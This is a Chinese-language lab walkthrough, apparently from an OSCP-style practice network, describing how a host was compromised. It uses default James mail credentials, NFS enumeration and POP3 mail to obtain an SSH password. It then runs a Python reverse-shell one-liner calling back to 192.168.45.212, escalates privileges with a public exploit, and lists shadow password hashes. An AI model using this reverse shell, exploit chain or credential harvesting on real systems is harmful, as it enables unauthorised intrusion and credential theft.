端口扫描
发现开放了web端口,但是好像没有内容
发现存在james服务,使用exploit https://www.exploit-db.com/exploits/50347 发现好像没作用
默认用户名密码为root/root
可以使用setpassword重置用户密码
然后访问110端口 使用 USER john 登录,发现没有回应
同时,发现存在2049 nfs端口。
使用
showmount -e 10.11.1.72 检测映射的文件夹
在本地创建个nfs目录,然后使用
mount -t nfs 10.11.1.72:/home nfs 进行挂载
可以看到成功的挂载了,只有marcus目录有内容
但是用户组不对没法打开
是因为默认挂在成了NFS4的版本
取消挂载并设置NFSv3版本
umount nfs
mount -t nfs -o vers=3 10.11.1.72:/home nfs
现在正确显示了用户和组,但是依然读取不了,陷入了循环!nfs好像只提供了linux系统的用户有哪些,更像是一个兔子洞。
继续回到110端口,真TM的,telnet就可以。
john没有内容
在尝试ryuu用户时,终于看到了希望
获取到了用户名和密码
username: ryuu password: QUHqhUPRKXMo4m7k
使用上面的密码登录ssh能够正常的登录。使用
ctrl + c 跳过
又是32位版本linux,唉
使用python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.212",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
提权
通过脚本 https://github.com/InteliSecureLabs/Linux_Exploit_Suggester/blob/master/Linux_Exploit_Suggester.pl
找到几个可以提权的漏洞
使用 https://www.exploit-db.com/exploits/35161 进行提权
读取
proof.txt文件,内容:94b90a5f2996a89b71d814d4f96c22f3
彩蛋(不是)
搜集
该linux主机用户名和密码信息:
| 用户名 | 哈希 | 密码 |
| root | $6$WWXC6Cv2$OeknUkXwiX3uctRjRIhK0AYzLv6uCjZGxJgtAdCy4YM4cHMKgyDtIJirEO/m.pgiiwFHfJTAndfATNQN1X0c2. | |
| ryuu | $6$tIWQdOd.$Adfe4hYI9n1ovKBIr9xByjslPY86Fiar7jMFRT2FfGAXwXD1mwLpsl1lpoo5jm4Y.XjD54TA/.Wp.ql0x4FUG/ | QUHqhUPRKXMo4m7k |